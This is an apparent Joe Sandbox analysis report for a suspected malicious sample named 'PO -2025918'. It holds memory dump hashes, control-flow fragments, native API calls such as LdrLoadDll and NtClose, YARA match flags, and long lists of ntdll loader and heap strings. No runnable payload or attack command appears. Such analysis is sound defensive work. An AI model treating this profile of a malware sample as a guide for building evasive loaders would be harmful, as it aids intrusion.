                                                                                                                            • Instruction ID: 5f28494ecc0785cd675dc85931c9683e936452b47fc25fdc63f6d266f30c3f95
                                                                                                                            • Opcode Fuzzy Hash: 64d6f71b81498668a47297111034b8f58dc5c8c83098e3235d7b8538f942dbf9
                                                                                                                            • Instruction Fuzzy Hash: 55E11AB4E0025A8FCB14DFA9D5909AEBBF2FF49304F248559E414A7356D730AD42CF64
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892562416.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7070000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5c58164488d85ab5ef131c5059594a85e61462c0b74bcba3c7d3cacb3c30bd1a
                                                                                                                            • Instruction ID: f42cc694a91eef43eb656ad4aa0dad5b80f9819050735b8b4e790c457af99322
                                                                                                                            • Opcode Fuzzy Hash: 5c58164488d85ab5ef131c5059594a85e61462c0b74bcba3c7d3cacb3c30bd1a
                                                                                                                            • Instruction Fuzzy Hash: 34E109B4E002598FCB14DFA9D5809AEBBF2FF89304F248169E414A735AD771AD41CFA4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1864848505.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2540000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0a53de19c3b7aac91e97e0e3b234b691ae6a2c0df7cbffbf8af082163c815eb0
                                                                                                                            • Instruction ID: 2b951191ea81897cdaa4ccd59840f79498886d2473e3f7475ce33444cda567d0
                                                                                                                            • Opcode Fuzzy Hash: 0a53de19c3b7aac91e97e0e3b234b691ae6a2c0df7cbffbf8af082163c815eb0
                                                                                                                            • Instruction Fuzzy Hash: 78A13A32E0021A8FCF09DFB9C84459EBBB2FF85308B15456AE805AB265DF35E956CF44
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892562416.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7070000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: fea629c3b676b1a3de83351c15d2e955f005d37562e9e6e43a6e8e4baa6f2405
                                                                                                                            • Instruction ID: 4b25a9117711ed30e02235ff059d0bdd5710be06c94cbfa8025161fba021221b
                                                                                                                            • Opcode Fuzzy Hash: fea629c3b676b1a3de83351c15d2e955f005d37562e9e6e43a6e8e4baa6f2405
                                                                                                                            • Instruction Fuzzy Hash: D95129B0E042598FDB14DFA9D5805AEBBF2FF89300F24C169D418AB356D734A941CFA5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892562416.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7070000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 86b200002441a74e288d00519c6f33598d92cf34047cf508f40a2d068a25de5e
                                                                                                                            • Instruction ID: 5a595a35c3f61f9e1f16235800f0297e448a7d8ba1f2deda159d65b8062792bd
                                                                                                                            • Opcode Fuzzy Hash: 86b200002441a74e288d00519c6f33598d92cf34047cf508f40a2d068a25de5e
                                                                                                                            • Instruction Fuzzy Hash: 8A510AB0E002598FDB14CFA9D5805AEBBF2FF89305F24C1A9D418AB356D734A941CFA5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1892562416.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_7070000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:1.2%
                                                                                                                            Dynamic/Decrypted Code Coverage:4.8%
                                                                                                                            Signature Coverage:8.8%
                                                                                                                            Total number of Nodes:147
                                                                                                                            Total number of Limit Nodes:10

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 73 417a63-417a7f 74 417a87-417a8c 73->74 75 417a82 call 42f643 73->75 76 417a92-417aa0 call 42fc43 74->76 77 417a8e-417a91 74->77 75->74 80 417ab0-417ac1 call 42e0f3 76->80 81 417aa2-417aad call 42fee3 76->81 86 417ac3-417ad7 LdrLoadDll 80->86 87 417ada-417add 80->87 81->80 86->87
                                                                                                                            APIs
                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AD5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_400000_PO -2025918.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Load
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2234796835-0

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 99 42c9c3-42c9ff call 404993 call 42dbe3 NtClose
                                                                                                                            APIs
                                                                                                                            • NtClose.NTDLL(00424CF4,?,-665E6599,?,?,00424CF4,?,00009D57), ref: 0042C9FA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_400000_PO -2025918.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Close
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3535843008-0

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 113 1bd2b60-1bd2b6c LdrInitializeThunk
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 115 1bd2df0-1bd2dfc LdrInitializeThunk
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 114 1bd2c70-1bd2c7c LdrInitializeThunk
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 116 1bd35c0-1bd35cc LdrInitializeThunk
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • PostThreadMessageW.USER32(-4108694,00000111,00000000,00000000), ref: 0041432A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_400000_PO -2025918.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: MessagePostThread
                                                                                                                            • String ID: -4108694$-4108694
                                                                                                                            • API String ID: 1836367815-789369925

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 14 417ae3-417aec 15 417ad1-417ad7 LdrLoadDll 14->15 16 417aee-417aef 14->16 19 417ada-417add 15->19 17 417af1-417af6 16->17 18 417a98-417aa0 16->18 20 417af8-417b08 17->20 21 417b0f 17->21 22 417ab0-417ac1 call 42e0f3 18->22 23 417aa2-417aad call 42fee3 18->23 20->21 24 417b11-417b29 21->24 22->19 31 417ac3-417ad0 22->31 23->22 24->24 28 417b2b-417b3b 24->28 31->15
                                                                                                                            APIs
                                                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AD5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_400000_PO -2025918.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Load
                                                                                                                            • String ID: axD3
                                                                                                                            • API String ID: 2234796835-3556351365

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 89 42ccf3-42cd34 call 404993 call 42dbe3 RtlAllocateHeap
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.NTDLL(00000104,?,00424CFF,?,?,00424CFF,?,00000104,?,00009D57), ref: 0042CD2F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_400000_PO -2025918.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1279760036-0

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 94 42cd43-42cd84 call 404993 call 42dbe3 RtlFreeHeap
                                                                                                                            APIs
                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,F845C700,00000007,00000000,00000004,00000000,004172CE,000000F4), ref: 0042CD7F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_400000_PO -2025918.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FreeHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3298025750-0

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 104 42cd93-42cdcc call 404993 call 42dbe3 ExitProcess
                                                                                                                            APIs
                                                                                                                            • ExitProcess.KERNEL32(?,00000000,00000000,?,9C41AA96,?,?,9C41AA96), ref: 0042CDC7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2124637174.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_400000_PO -2025918.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 621844428-0

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 109 1bd2c0a-1bd2c0f 110 1bd2c1f-1bd2c26 LdrInitializeThunk 109->110 111 1bd2c11-1bd2c18 109->111
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2994545307-0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-2160512332
                                                                                                                            Strings
                                                                                                                            • double initialized or corrupted critical section, xrefs: 01C05508
                                                                                                                            • 8, xrefs: 01C052E3
                                                                                                                            • Invalid debug info address of this critical section, xrefs: 01C054B6
                                                                                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01C0540A, 01C05496, 01C05519
                                                                                                                            • Thread identifier, xrefs: 01C0553A
                                                                                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01C05543
                                                                                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01C054E2
                                                                                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01C054CE
                                                                                                                            • Critical section address., xrefs: 01C05502
                                                                                                                            • undeleted critical section in freed memory, xrefs: 01C0542B
                                                                                                                            • Address of the debug info found in the active list., xrefs: 01C054AE, 01C054FA
                                                                                                                            • Critical section debug info address, xrefs: 01C0541F, 01C0552E
                                                                                                                            • corrupted critical section, xrefs: 01C054C2
                                                                                                                            • Critical section address, xrefs: 01C05425, 01C054BC, 01C05534
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                            • API String ID: 0-2368682639
                                                                                                                            Strings
                                                                                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 01C0261F
                                                                                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01C02506
                                                                                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01C024C0
                                                                                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01C02412
                                                                                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01C022E4
                                                                                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01C02409
                                                                                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01C025EB
                                                                                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01C02624
                                                                                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01C02602
                                                                                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01C02498
                                                                                                                            • @, xrefs: 01C0259B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                            • API String ID: 0-4009184096
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                            • API String ID: 0-2515994595
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                            • API String ID: 0-1700792311
                                                                                                                            Strings
                                                                                                                            • VerifierDebug, xrefs: 01C18CA5
                                                                                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01C18A3D
                                                                                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01C18A67
                                                                                                                            • HandleTraces, xrefs: 01C18C8F
                                                                                                                            • VerifierDlls, xrefs: 01C18CBD
                                                                                                                            • VerifierFlags, xrefs: 01C18C50
                                                                                                                            • AVRF: -*- final list of providers -*- , xrefs: 01C18B8F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                            • API String ID: 0-3223716464
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                            • API String ID: 0-1109411897
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-792281065
                                                                                                                            Strings
                                                                                                                            • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01BE99ED
                                                                                                                            • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01BE9A2A
                                                                                                                            • apphelp.dll, xrefs: 01B86496
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01BE9A11, 01BE9A3A
                                                                                                                            • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01BE9A01
                                                                                                                            • LdrpInitShimEngine, xrefs: 01BE99F4, 01BE9A07, 01BE9A30
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                            • API String ID: 0-204845295
                                                                                                                            Strings
                                                                                                                            • LdrpInitializeProcess, xrefs: 01BCC6C4
                                                                                                                            • Loading import redirection DLL: '%wZ', xrefs: 01C08170
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01BCC6C3
                                                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01C08181, 01C081F5
                                                                                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 01C081E5
                                                                                                                            • LdrpInitializeImportRedirection, xrefs: 01C08177, 01C081EB
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                            • API String ID: 0-475462383
                                                                                                                            Strings
                                                                                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01C0219F
                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01C02178
                                                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01C021BF
                                                                                                                            • SXS: %s() passed the empty activation context, xrefs: 01C02165
                                                                                                                            • RtlGetAssemblyStorageRoot, xrefs: 01C02160, 01C0219A, 01C021BA
                                                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01C02180
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                            • API String ID: 0-861424205
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 01BD2DF0: LdrInitializeThunk.NTDLL ref: 01BD2DFA
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01BD0BA3
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01BD0BB6
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01BD0D60
                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01BD0D74
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1404860816-0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                            • API String ID: 0-379654539
                                                                                                                            Strings
                                                                                                                            • LdrpInitializeProcess, xrefs: 01BC8422
                                                                                                                            • @, xrefs: 01BC8591
                                                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01BC8421
                                                                                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 01BC855E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000004.00000002.2125457765.0000000001B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 01B60000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_4_2_1b60000_PO -2025918.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
